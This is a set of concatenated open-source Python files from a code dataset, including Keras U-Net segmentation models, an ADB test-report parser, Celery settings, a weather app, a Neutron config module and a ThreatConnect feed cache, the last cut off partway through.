conv2])\r\n conv4 = Convolution2D(64, (3, 3), activation='relu', padding='same')(up1)\r\n conv4 = BatchNormalization()(conv4)\r\n\r\n up2 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv4), conv1])\r\n conv5 = Convolution2D(32, (3, 3), activation='relu', padding='same')(up2)\r\n conv5 = BatchNormalization()(conv5)\r\n\r\n conv7 = Convolution2D(16, (1, 1), activation='relu')(conv5)\r\n conv7 = BatchNormalization()(conv7)\r\n conv7 = Dropout(rate=0.33)(conv7)\r\n last_conv = Convolution2D(out_ch, (1, 1), activation=final_act)(conv7)\r\n \r\n model = Model(inputs=inputs, outputs=last_conv)\r\n if loss_fn:\r\n model.compile(optimizer=Adam(lr=1e-4), loss=loss_fn, metrics=['accuracy'])\r\n return model\r\n \r\ndef big_unet(patch_height, patch_width, in_ch, out_ch, final_act='sigmoid', loss_fn=None):\r\n inputs = Input((patch_height, patch_width, in_ch))\r\n conv1 = Convolution2D(64, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = BatchNormalization()(conv1)\r\n conv1 = Convolution2D(64, (3, 3), activation='relu', padding='same')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Convolution2D(128, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = BatchNormalization()(conv2)\r\n conv2 = Convolution2D(128, (3, 3), activation='relu', padding='same')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Convolution2D(256, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = BatchNormalization()(conv3)\r\n conv3 = Convolution2D(256, (3, 3), activation='relu', padding='same')(conv3)\r\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n \r\n conv3a = Convolution2D(512, (3, 3), activation='relu', padding='same')(pool3)\r\n conv3a = BatchNormalization()(conv3a)\r\n conv3a = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv3a)\r\n pool3a = MaxPooling2D(pool_size=(2, 2))(conv3a)\r\n \r\n conv4 = Convolution2D(512, (3, 3), activation='relu', padding='same')(pool3a)\r\n conv4 = BatchNormalization()(conv4)\r\n conv4 = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv4)\r\n \r\n up1a = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv4), conv3a])\r\n conv5a = Convolution2D(512, (3, 3), activation='relu', padding='same')(up1a)\r\n conv5a = BatchNormalization()(conv5a)\r\n conv5a = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv5a)\r\n \r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv5a), conv3])\r\n conv5 = Convolution2D(256, (3, 3), activation='relu', padding='same')(up1)\r\n conv5 = BatchNormalization()(conv5)\r\n conv5 = Convolution2D(256, (3, 3), activation='relu', padding='same')(conv5)\r\n \r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv5), conv2])\r\n conv6 = Convolution2D(128, (3, 3), activation='relu', padding='same')(up1)\r\n conv6 = BatchNormalization()(conv6)\r\n conv6 = Convolution2D(128, (3, 3), activation='relu', padding='same')(conv6)\r\n\r\n up2 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv6), conv1])\r\n conv7 = Convolution2D(64, (3, 3), activation='relu', padding='same')(up2)\r\n conv7 = BatchNormalization()(conv7)\r\n conv7 = Convolution2D(64, (3, 3), activation='relu', padding='same')(conv7)\r\n \r\n conv8 = Convolution2D(32, (1, 1), activation='relu')(conv7)\r\n conv8 = BatchNormalization()(conv8)\r\n conv8 = Dropout(rate=0.33)(conv8)\r\n last_conv = Convolution2D(out_ch, (1, 1), activation=final_act)(conv8)\r\n\r\n model = Model(inputs=inputs, outputs=last_conv)\r\n if loss_fn:\r\n model.compile(optimizer=Adam(lr=1e-4), loss=loss_fn, metrics=['accuracy'])\r\n return model\r\n\r\n##########\r\n# Losses #\r\n##########\r\n\r\nsmooth = 1e-5\r\ndef dice_coef(y_true, y_pred):\r\n y_true_f = K.flatten(y_true)\r\n y_pred_f = K.flatten(y_pred)\r\n intersection = K.sum(y_true_f * y_pred_f)\r\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\r\n \r\ndef dice_loss(y_true, y_pred):\r\n return -dice_coef(y_true, y_pred)\r\n\r\ndef tversky_loss(y_true, y_pred):\r\n alpha = 0.5\r\n beta = 0.5\r\n ones = K.ones(K.shape(y_true))\r\n p0 = y_pred # proba that voxels are class i\r\n p1 = ones-y_pred # proba that voxels are not class i\r\n g0 = y_true\r\n g1 = ones-y_true\r\n \r\n num = K.sum(p0*g0, (0,1,2))\r\n den = num + alpha*K.sum(p0*g1,(0,1,2)) + beta*K.sum(p1*g0,(0,1,2))\r\n T = K.sum(num/den) # when summing over classes, T has dynamic range [0 Ncl]\r\n \r\n Ncl = K.cast(K.shape(y_true)[-1], 'float32')\r\n return Ncl-T\r\n\r\ndef multi_dice_coef_loss(num_classes, channel_weights=None):\r\n def _multi_dice_coef_loss(y_true, y_pred):\r\n loss = 0.\r\n total = K.sum(K.flatten(y_true)) + smooth\r\n denominator = 0.\r\n for i in range(num_classes):\r\n denominator += total / (K.sum(K.flatten(y_true[...,i])) + smooth)\r\n \r\n for i in range(num_classes):\r\n ratio_i = total / K.sum(K.flatten(y_true[...,i]))\r\n ratio_i = ratio_i / denominator\r\n if channel_weights:\r\n ratio_i = ratio_i * channel_weights[i]\r\n loss += ratio_i * dice_loss(y_true, y_pred)\r\n return loss\r\n return _multi_dice_coef_loss\r\n","repo_name":"wtreible/VIMSSegNet","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17557540536","text":"#!/usr/bin/env python\n'''A Python module containing functionality for parsing and creating junit reports form adb test runners output.\n'''\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom\nimport os\nimport logging\n\n__author__ = 'Andreas Nilsson'\n__email__ = 'andreas.nilsson@jayway.com'\n__copyright__ = \"Copyright 2013, Jayway\"\n__license__ = 'Apache 2.0'\n\n#Constants\n_COLON_CHAR = ':'\n_EQUALS_CHAR = '='\n_DOT_CHAR = '.'\n\n#Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n#Formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n#Setup Console logging\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(formatter)\n\n#Add logger handlers\nlogger.addHandler(ch)\n\n\n_process_error_words = ['INSTRUMENTATION_RESULT', 'INSTRUMENTATION_CODE']\n\nclass TestObject(object):\n '''The parsed representation from the adb output of running an instrument.'''\n class_name = ''\n\n # Dict format: {method : (type, details)}\n erroneous_methods = dict()\n _last_failed_method = None\n\n def __init__(self, class_name=''):\n self.class_name = class_name\n self.erroneous_methods = dict()\n self._last_failed_method = 'Unknown Method'\n\n def __str__(self):\n str = 'class:\\n%s\\n' % self.class_name\n str += 'failed methods:\\n'\n for key in self.erroneous_methods:\n str += key + '\\n'\n type, details = self.erroneous_methods[key]\n str += 'type: %s\\n' % type\n str += 'details: %s\\n' % details\n\n return str\n\n\n def add_failed_method(self, method_name):\n self._last_failed_method = method_name\n self.erroneous_methods[method_name] = (None, None)\n\n\n def has_failures(self):\n return True if self.erroneous_methods else False\n\n\n def add_error(self, error_type, error_details):\n '''\n Adds an error for the last registered method.\n Limitation: There could be only one error per method\n '''\n if self._last_failed_method:\n self.erroneous_methods[self._last_failed_method] = (error_type, error_details)\n\n\n def get_error(self, method_name):\n '''\n Returns the error for a specific method name.\n '''\n if self.erroneous_methods[method_name]:\n return self.erroneous_methods[method_name]\n else:\n return None\n\n\ndef _is_line_process_crash(line):\n return any(word in line for word in _process_error_words)\n\n\ndef _parse_test_object_from_line(line):\n test_obj = None\n split = line.split(_COLON_CHAR)\n\n if len(split) > 1:\n class_line = split[0]\n # checks that there is at least two dots thus giving us confidence\n # That it is probably a class name on that line.\n if class_line.count(_DOT_CHAR) > 2:\n test_obj = TestObject(class_line)\n\n\n if not test_obj:\n logger.error('Could not parse object from line: %s', line)\n return test_obj\n\n\ndef _parse_process_crash_error(line, next_line):\n error_type = None\n error_details = None\n split = line.split(_COLON_CHAR)\n if len(split) > 1 and 'shortMsg' in line:\n if len(line.split(_EQUALS_CHAR)) > 1:\n error_type = line.split(_EQUALS_CHAR)[1]\n\n #next line has full msg\n if next_line and 'longMsg' in next_line:\n error_details = next_line.split(_EQUALS_CHAR)[1]\n\n return error_type, error_details\n\n\ndef parse_adb_output(output):\n try:\n logger.debug(\"ADB Output: %s\", output)\n lines = output.splitlines()\n all_objects = []\n test_obj = None\n\n for i, line in enumerate(lines):\n line = line.strip('\\t').strip()\n\n if not line:\n continue\n\n is_failure = line.startswith('Failure')\n is_stacktrace = line.startswith('at')\n is_type_of_fail_line = line.startswith('junit')\n is_last_parse_line = 'Test results for' in line\n\n if is_last_parse_line:\n break\n elif is_failure:\n if 'in' in line:\n failed_method = line.split('in')[1].strip(\" :\")\n if failed_method and test_obj:\n test_obj.add_failed_method(failed_method)\n elif is_type_of_fail_line:\n split = line.split(_COLON_CHAR)\n if len(split) > 1:\n error_type = split[0]\n error_details = line\n\n if error_type:\n test_obj.add_error(error_type, error_details)\n elif is_stacktrace:\n pass\n else:\n new_test_obj = _parse_test_object_from_line(line)\n\n if new_test_obj:\n test_obj = new_test_obj\n all_objects.append(test_obj)\n else:\n logger.debug('Failed to parse object from line \"%s', line)\n\n if _is_line_process_crash(line):\n next_line = None\n\n try:\n next_line = lines[i + 1]\n except IndexError:\n pass\n\n error_type, error_details = _parse_process_crash_error(line, next_line)\n\n if error_type:\n test_obj.add_error(error_type, error_details)\n\n logger.info(\"Created %d test objects\" % len(all_objects))\n logger.info(\"Objects failed: %d\" % get_no_failed_objects(all_objects))\n return all_objects\n except Exception as e:\n logger.error(e.message)\n logger.error('Failed to parse adb output properly')\n return []\n\n\n\ndef parse_and_generate_xml(adb_output):\n return generate_junit_xml_report(parse_adb_output(adb_output))\n\n\ndef generate_junit_xml_report(test_objects, success_message='Successful'):\n test_suite = ET.Element('testsuite')\n\n for obj in test_objects:\n if obj.has_failures():\n for method_name in obj.erroneous_methods:\n type, details = obj.get_error(method_name)\n\n test_case = ET.SubElement(test_suite, 'testcase', {'classname': obj.class_name, 'name': method_name})\n\n failure = ET.SubElement(test_case, 'failure', {'type': type})\n failure.text = details\n\n else:\n ET.SubElement(test_suite, 'testcase', {'classname': obj.class_name, 'name': success_message})\n\n x = xml.dom.minidom.parseString(ET.tostring(test_suite))\n return x.toprettyxml()\n\n\ndef get_no_failed_objects(test_objects):\n return sum(obj.has_failures() for obj in test_objects)\n\n\ndef write_to_file(filename, report, use_relative_path=True):\n if filename:\n full_filename = os.getcwd() + os.sep + filename if use_relative_path else filename\n\n out_file = open(full_filename, 'w')\n\n #noinspection PyCompatibility\n try:\n out_file.write(report)\n except IOError:\n logger.error('failed to write file to disk: ' + str(IOError.message))\n finally:\n logger.info('Wrote report to file: %s', full_filename)\n out_file.close()\n else:\n logger.error('A proper filename not provided')\n\n","repo_name":"jayway/adbutils","sub_path":"adbparser.py","file_name":"adbparser.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72762817514","text":"from datetime import timedelta\nfrom celery.schedules import crontab\n\nBROKER_URL = 'redis://localhost:6379/1'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/2'\nCELERY_IGNORE_RESULT = False\nCELERY_SEND_TASK_ERROR_EMAILS = False\nCELERY_DEFAULT_QUEUE = 'default'\nCELERY_DEFAULT_EXCHANGE = 'default'\nCELERY_DEFAULT_EXCHANGE_TYPE = 'topic'\nCELERY_DEFAULT_ROUTING_KEY = 'task.default'\n\nCELERY_IMPORTS = (\n \"med_social.tasks\",\n)\n\nCELERY_QUEUES = {\n 'default': {\n 'exchange': 'default',\n 'exchange_type': 'topic',\n 'binding_key': 'task.#',\n },\n\n 'aggregator': {\n 'exchange': 'aggregator',\n 'exchange_type': 'topic',\n 'binding_key': 'aggregator.#'\n },\n 'fast': {\n 'exchange': 'fast',\n 'exchange_type': 'topic',\n 'binding_key': 'celery_fast.#'\n },\n 'long': {\n 'exchange': 'long',\n 'exchange_type': 'topic',\n 'binding_key': 'celery_long.#'\n }\n}\n\nCELERY_ROUTES = {\n 'aggregator.tasks.*': {\n 'queue': 'aggregator',\n 'routing_key': 'aggregator.search'\n },\n 'vendors.tasks.populate_vendors_clearbit_data': {\n 'queue': 'long'\n }\n}\n\n\n#CELERYBEAT_SCHEDULE = {\n #'add-every-30-seconds': {\n # 'task': 'tasks.add',\n # 'schedule': timedelta(seconds=30),\n # 'args': (16, 16)\n #},\n#}\n\nCELERYBEAT_SCHEDULE = {\n 'populate-clearbit': {\n 'task': 'vendors.tasks.populate_vendors_clearbit_data',\n 'schedule': timedelta(days=1),\n 'args': ()\n }\n}\n\nCELERYD_PREFETCH_MULTIPLIER = 1\n\n\nimport djcelery\ndjcelery.setup_loader()\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"med_social/settings/celery_settings.py","file_name":"celery_settings.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13942161529","text":"import os \r\nimport json\r\nimport time\r\nimport calendar\r\nimport requests\r\nimport xlsxwriter\r\n\r\nimg_folder = 'img'\r\n\r\n#create img folder\r\nif not os.path.exists('img'):\r\n os.makedirs(img_folder)\r\n\r\n#read Json data\r\nwith open('MOCK_DATA.json', 'r') as f:\r\n json_data = json.load(f)\r\n\r\n#img download and store in img folder\r\nfor img in json_data:\r\n response = requests.get(img['avatar'])\r\n id = img['id']\r\n with open(f'{img_folder}/image{id}.jpg', 'wb') as f:\r\n f.write(response.content)\r\n\r\n# Group the data by company name\r\ngroups = {}\r\nfor item in json_data:\r\n company = item['company_name']\r\n if company not in groups:\r\n groups[company] = []\r\n groups[company].append(item)\r\n\r\n#xlsx File name using timestamp\r\nfile_name = time.gmtime()\r\nxlsx_name = str(calendar.timegm(file_name))+'.xlsx'\r\nworkbook = xlsxwriter.Workbook(xlsx_name)\r\nworksheet = workbook.add_worksheet()\r\nworksheet.set_column('B:M', 17)\r\n\r\n#Bold and Font Size of Row rang 0 to 1\r\nuser_data = workbook.add_format({'bold': True})\r\nuser_data.set_font_size(18)\r\nuser_data.set_align('center')\r\nuser_data.set_align('vcenter')\r\nuser_data.set_bg_color('#BBE3BC')\r\nuser_data.set_font_name('Arial')\r\n\r\n#Bold and font size of row rang 2 to 3\r\ncell_format = workbook.add_format({'bold': True})\r\ncell_format.set_font_size(12)\r\ncell_format.set_align('center')\r\ncell_format.set_align('vcenter')\r\ncell_format.set_bg_color('#FEF2CD')\r\ncell_format.set_font_name('Arial')\r\n\r\n#Haders style in excelsheet\r\nworksheet.merge_range(0, 0, 1, 12, 'Users Data', user_data)\r\nworksheet.merge_range(2, 0, 3, 0, 'SR.', cell_format)\r\nworksheet.merge_range(2, 1, 3, 1, 'Avatar', cell_format)\r\nworksheet.merge_range(2, 2, 3, 2, 'ID', cell_format)\r\nworksheet.merge_range(2, 3, 3, 3, 'First Name', cell_format)\r\nworksheet.merge_range(2, 4, 3, 4, 'Last Name', cell_format)\r\nworksheet.merge_range(2, 5, 3, 5, 'Email', cell_format)\r\nworksheet.merge_range(2, 6, 3, 6, 'Gender', cell_format)\r\nworksheet.merge_range(2, 7, 3, 7, 'Company Name', cell_format)\r\nworksheet.merge_range(2, 8, 3, 8, 'Job Title', cell_format)\r\nworksheet.merge_range(2, 9, 3, 9, 'Skills', cell_format)\r\nworksheet.merge_range(2, 10, 2, 12, 'Car', cell_format)\r\nworksheet.write(3, 10, 'Make', cell_format)\r\nworksheet.write(3, 11, 'Model', cell_format)\r\nworksheet.write(3, 12, 'Year', cell_format)\r\n\r\ni, j, row = 1, 4, 4\r\ncell_width = 50\r\ncell_height = 50\r\nfor company, items in groups.items():\r\n for data in items:\r\n worksheet.set_row(j, 45)\r\n worksheet.write(row, 0, i)\r\n id = data['id']\r\n worksheet.insert_image(row, 1, f'{img_folder}/image{id}.jpg', {'width': 50, 'height': 50})\r\n worksheet.write(row, 2, data['id'])\r\n worksheet.write(row, 3, data['first_name'])\r\n worksheet.write(row, 4, data['last_name'])\r\n worksheet.write(row, 5, data['email'])\r\n worksheet.write(row, 6, data['gender'])\r\n worksheet.write(row, 7, data['company_name'])\r\n worksheet.write(row, 8, data['job_title'])\r\n skills = ', '.join(data['skills'])\r\n worksheet.write(row, 9, skills)\r\n worksheet.write(row, 10, data['car']['make'])\r\n worksheet.write(row, 11, data['car']['model'])\r\n worksheet.write(row, 12, data['car']['year'])\r\n i +=1\r\n j +=1\r\n row +=1\r\n\r\nworkbook.close()\r\n","repo_name":"Bala-py-dev/task_propelius","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41792433796","text":"# -*- coding: utf-8 -*-\n# __file__ : 509. 斐波那契数.py\n# __time__ : 2020/6/27 10:04 下午\n\nimport typing\n\n\n\"\"\"\n斐波那契数,通常用 F(n) 表示,形成的序列称为斐波那契数列。该数列由 0 和 1 开始,后面的每一项数字都是前面两项数字的和。也就是:\n\nF(0) = 0,   F(1) = 1\nF(N) = F(N - 1) + F(N - 2), 其中 N > 1.\n给定 N,计算 F(N)。\n\n \n\n示例 1:\n\n输入:2\n输出:1\n解释:F(2) = F(1) + F(0) = 1 + 0 = 1.\n示例 2:\n\n输入:3\n输出:2\n解释:F(3) = F(2) + F(1) = 1 + 1 = 2.\n示例 3:\n\n输入:4\n输出:3\n解释:F(4) = F(3) + F(2) = 2 + 1 = 3.\n\n输入:5\n输出:\n解释:F(5) = F(4) + F(3) = 3 + 2 = 5\n \n\n提示:\n\n0 ≤ N ≤ 30\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/fibonacci-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n # def fib(self, N: int) -> int:\n # if N <= 1:\n # return N\n # return self.memoize(N)\n #\n # def memoize(self, N: int) -> {}:\n # cache = {0: 0, 1: 1}\n #\n # # Since range is exclusive and we want to include N, we need to put N+1.\n # for i in range(2, N + 1):\n # cache[i] = cache[i - 1] + cache[i - 2]\n #\n # return cache[N]\n def fib(self, N: int) -> int:\n if N <= 1:\n return N\n if N == 2:\n return 1\n\n current = 0\n pre1 = 1\n pre2 = 1\n for i in range(3, N + 1):\n current = pre1 + pre2\n pre2 = pre1\n pre1 = current\n return current\n\n # 备忘录,DPtable\n\n\nif __name__ == \"__main__\":\n\n print(Solution().fib(300))\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"algorithm_study/LeetCode/509. 斐波那契数.py","file_name":"509. 斐波那契数.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8670340061","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\n\nfrom neutron._i18n import _\nfrom neutron.common import _constants\n\nAGENT_OPTS = [\n # The agent_down_time value can only be a max of INT_MAX (as defined in C),\n # where int is usually 32 bits. The agent_down_time will be passed to\n # eventlet in milliseconds and any number higher will produce an OverFlow\n # error. More details here: https://bugs.launchpad.net/neutron/+bug/2028724\n cfg.IntOpt('agent_down_time', default=75,\n max=((2**32 / 2 - 1) // 1000),\n help=_(\"Seconds to regard the agent as down; should be at \"\n \"least twice report_interval, to be sure the \"\n \"agent is down for good.\")),\n cfg.StrOpt('dhcp_load_type', default='networks',\n choices=['networks', 'subnets', 'ports'],\n help=_('Representing the resource type whose load is being '\n 'reported by the agent. This can be \"networks\", '\n '\"subnets\" or \"ports\". '\n 'When specified (Default is networks), the server will '\n 'extract particular load sent as part of its agent '\n 'configuration object from the agent report state, '\n 'which is the number of resources being consumed, at '\n 'every report_interval. '\n 'dhcp_load_type can be used in combination with '\n 'network_scheduler_driver = '\n 'neutron.scheduler.dhcp_agent_scheduler.WeightScheduler '\n 'When the network_scheduler_driver is WeightScheduler, '\n 'dhcp_load_type can be configured to represent the '\n 'choice for the resource being balanced. '\n 'Example: dhcp_load_type=networks')),\n cfg.BoolOpt('enable_new_agents', default=True,\n help=_(\"Agents start with admin_state_up=False when \"\n \"enable_new_agents=False. In this case, a user's \"\n \"resources will not be scheduled automatically to an \"\n \"agent until an admin sets admin_state_up to True.\")),\n cfg.IntOpt(\"rpc_resources_processing_step\",\n default=_constants.RPC_RES_PROCESSING_STEP, min=1,\n help=_(\"Number of resources for neutron to divide \"\n \"a large RPC call into data sets. It can be reduced \"\n \"if RPC timeouts occur. The best value should be \"\n \"determined empirically in your environment.\"))\n]\n\n\ndef register_db_agents_opts(conf=cfg.CONF):\n conf.register_opts(AGENT_OPTS)\n","repo_name":"openstack/neutron","sub_path":"neutron/conf/agent/database/agents_db.py","file_name":"agents_db.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"73351350953","text":"import tkinter as tk\r\nimport requests\r\nimport time\r\n\r\ndef getWeather(canvas):\r\n city = textfield.get()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\" + city + \"&appid=2854010aff2f442351d8c0ab2e40c279\"\r\n json_data = requests.get(api).json()\r\n temperature = int(json_data['main']['temp'] - 273.15)\r\n condition = json_data['weather'][0]['main']\r\n pressure = json_data['main']['pressure']\r\n humidity = json_data['main']['humidity']\r\n srise = time.strftime(\"%H:%M:%S\", time.gmtime(json_data['sys']['sunrise'] + 28800))\r\n sset = time.strftime(\"%H:%M:%S\", time.gmtime(json_data['sys']['sunset'] + 28800))\r\n\r\n final_info = condition + '\\n' + str(temperature) + \"°C\"\r\n final_data = 'Pressure: ' + str(pressure) + \"Hg\" + '\\n' + 'Humidity: ' + str(humidity) + \"%\" + '\\n' + 'Sunrise: ' + srise + '\\n' + 'Sunset: ' + sset\r\n label1.config(text=final_info)\r\n label2.config(text=final_data)\r\n\r\n#canvas for rectangular area\r\ncanvas = tk.Tk()\r\ncanvas.geometry(\"600x600\")\r\ncanvas.title(\"Weather App\")\r\n#font\r\nf = (\"vendetta\", 14, \"italic\")\r\nt = (\"helvetica\", 30, \"bold\")\r\n\r\n#textfields for data entry\r\ntextfield = tk.Entry(canvas, justify='center', font=t)\r\ntextfield.pack(pady=24)\r\ntextfield.focus()\r\ntextfield.bind('<Return>', getWeather)\r\n\r\n\r\nlabel1 = tk.Label(canvas, font=t)\r\nlabel1.pack()\r\nlabel2 = tk.Label(canvas, font=f)\r\nlabel2.pack()\r\ncanvas.mainloop()","repo_name":"itshariiiiiiiiiiii/Progressio","sub_path":"Category 2.py","file_name":"Category 2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44305740964","text":"import errno\nimport gc\nimport logging\nimport os\nimport shutil\nimport textwrap\nimport threading\n# noinspection PyProtectedMember\nfrom timeit import default_timer as timer\n\nimport cbint.utils.feed\nimport simplejson as json\nfrom jinja2 import Template\n\n_logger = logging.getLogger(__name__)\n\n\nclass FeedCacheBase(object):\n \"\"\"Manages the feed data that is cached on disk.\n\n Going forward, instead of keeping a feed in memory, it is now stored on disk. This is to reduce memory\n footprint of long running process.\n \"\"\"\n _feed_cache_new_file = \"feed.cache_new\"\n _feed_cache_file = \"feed.cache\"\n # noinspection PyUnusedName\n _reports_cache_file = \"reports.cache\"\n\n def __init__(self, config, location, lock=None):\n self._config = config\n self._location = location\n self._internal_lock = not lock\n self._lock = lock or threading.RLock()\n self._exists = False\n\n # noinspection PyUnusedFunction\n @property\n def lock(self):\n \"\"\"This is the mutex used to access the cache file.\"\"\"\n return self._lock\n\n @property\n def location(self):\n return self._location\n\n @property\n def file_name(self):\n return self._feed_cache_file\n\n def _ensure_location_exists(self):\n \"\"\"This was taken from cbint.utils.filesystem to reduce the imports.\"\"\"\n if not os.path.exists(self._location):\n try:\n os.makedirs(self._location)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def _swap_file_cache(self):\n with self._lock:\n # This is a quick operation that will not leave the file in an invalid state.\n shutil.move(os.path.join(self._location, self._feed_cache_new_file),\n os.path.join(self._location, self._feed_cache_file))\n\n def __del__(self):\n if self._internal_lock:\n del self._lock\n del self._config\n del self._location\n\n\nclass FeedStreamBase(object):\n \"\"\"A Feed Stream is used to save a feed bit by bit instead of all at once.\"\"\"\n\n def __init__(self):\n self._complete = False\n self._report_count = 0\n self._ioc_count = 0\n\n def __enter__(self):\n self.open()\n return self\n\n def open(self):\n raise NotImplementedError()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def close(self):\n raise NotImplementedError()\n\n @property\n def complete(self):\n \"\"\"\n Determines if feed storage has completed. If this is not set to true by the time close() or __exit() is called,\n it is assumed the writing of the feed was not completed and therefore is scrapped.\n \"\"\"\n return self._complete\n\n @complete.setter\n def complete(self, value):\n self._complete = value\n\n @property\n def report_count(self):\n return self._report_count\n\n @property\n def ioc_count(self):\n return self._ioc_count\n\n def write(self, report):\n raise NotImplementedError()\n\n\nclass FeedStream(FeedCacheBase, FeedStreamBase):\n \"\"\"Allows reports to be written in a streamed way instead of all at once to save memory.\"\"\"\n\n _feed_header_template = Template(textwrap.dedent(\"\"\"\n ],\n \"feedinfo\": {\n \"category\": \"Partner\",\n \"provider_url\": \"http://www.threatconnect.com/\",\n \"display_name\": \"{{display_name}}\",\n \"name\": \"threatconnectintegration\",\n \"tech_data\": \"There are no requirements to share any data to receive this feed.\",\n \"summary\": \"Threat intelligence data provided by ThreatConnect to the VMware Carbon Black Community\",\n \"icon_small\": \"{{icon_small}}\",\n \"icon\": \"{{icon}}\",\n \"num_reports\": {{num_reports}}\n }\n }\"\"\"))\n\n def __init__(self, config, location, lock):\n FeedCacheBase.__init__(self, config, location, lock)\n FeedStreamBase.__init__(self)\n self._file = None\n\n def open(self):\n if self._file:\n raise IOError(\"Stream is already open. Cannot open a new stream until this one is closed.\")\n\n self._report_count = 0\n self._ioc_count = 0\n self._complete = False\n\n self._ensure_location_exists()\n self._file = open(os.path.join(self._location, self._feed_cache_new_file), \"w\")\n # We have to write the reports first and then the feed info because the number of reports is not yet known.\n self._file.write(textwrap.dedent(\"\"\"\n {\n \"reports\":\n [\"\"\"))\n\n def close(self):\n if not self._file:\n raise IOError(\"Stream must be opened before it can be closed.\")\n try:\n self._file.write(self._feed_header_template.render(\n display_name=self._config.display_name,\n icon_small=cbint.utils.feed.generate_icon(\n \"{}/{}\".format(self._config.directory, self._config.integration_image_small_path)),\n icon=cbint.utils.feed.generate_icon(\n \"{}/{}\".format(self._config.directory, self._config.integration_image_path)),\n num_reports=self._report_count\n ))\n finally:\n self._file.close()\n self._file = None\n if self._complete:\n self._swap_file_cache()\n\n def write(self, report):\n if not self._file:\n raise IOError(\"Stream must be opened before it can be written to.\")\n report_text = json.dumps(report, indent=2 if self._config.pretty_print_json else None)\n self._file.write(\"{}\\n{}\".format(\",\" if self._report_count else \"\", report_text))\n\n self._report_count += 1\n for ioc_list in report[\"iocs\"].values():\n self._ioc_count += len(ioc_list)\n\n\nclass FeedCache(FeedCacheBase):\n \"\"\"Manages the feed data that is cached on disk.\n\n Going forward, instead of keeping a feed in memory, it is now stored on disk. This is to reduce memory\n footprint of long running process.\n \"\"\"\n\n def __init__(self, config, location, lock):\n super(FeedCache, self).__init__(config, location, lock)\n\n def verify(self):\n \"\"\"Checks to see if the feed cache exists on disk.\n Once it is determined to exist, it is never checked again.\n \"\"\"\n if self._exists:\n return True\n self._ensure_location_exists()\n with self._lock:\n if not os.path.isfile(os.path.join(self._location, \"feed.cache\")):\n if os.path.isfile(os.path.join(self._location, \"reports.cache\")):\n _logger.warning(\"Feed cache file missing. Reading report cache to create feed.\")\n try:\n with open(os.path.join(self._location, \"reports.cache\"), \"r\") as f:\n reports = json.loads(f.read())\n if self.write_reports(reports):\n self._exists = True\n except (IOError, OSError) as e:\n _logger.warning(\"Could not read from reports cache: {0}\".format(e))\n else:\n _logger.warning(\"Feed cache and report cache missing. Instance appears new.\")\n else:\n self._exists = True\n gc.collect()\n return self._exists\n\n @property\n def exists(self):\n return self.verify()\n\n def generate_feed(self, reports=None):\n \"\"\"\n Generate a feed definition.\n :param reports: list of report definitions\n :return: defined feed\n \"\"\"\n reports = reports or []\n feed = cbint.utils.feed.generate_feed(\n self._config.feed_name,\n summary=\"Threat intelligence data provided by ThreatConnect to the VMware Carbon Black Community\",\n tech_data=\"There are no requirements to share any data to receive this feed.\",\n provider_url=\"http://www.threatconnect.com/\",\n icon_path=\"{}/{}\".format(self._config.directory, self._config.integration_image_path),\n small_icon_path=\"{}/{}\".format(self._config.directory, self._config.integration_image_small_path),\n display_name=self._config.display_name,\n category=\"Partner\")\n 